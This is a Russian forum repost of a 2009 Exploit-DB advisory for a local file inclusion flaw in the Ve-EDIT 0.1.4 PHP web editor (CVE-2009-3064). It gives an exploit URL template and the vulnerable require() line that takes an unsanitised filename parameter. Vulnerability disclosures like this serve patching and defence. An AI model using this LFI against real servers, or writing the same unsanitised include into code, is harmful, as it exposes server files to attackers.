- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9570
- Проверка EDB
-
- Пройдено
- Автор
- COBRA_21
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3064
- Дата публикации
- 2009-09-01
Код:
-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu[at]windowslive[dot]com
Script Download: http://sourceforge.net/projects/phpwebeditor/
-------------------------------------------------------------------------------------
EXPLOİT:
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFİ]
-------------------------------------------------------------------------------------
BUG
Line 53: require("./../".$_GET["filename"]);
-------------------------------------------------------------------------------------
# milw0rm.com [2009-09-01]
- Источник
- www.exploit-db.com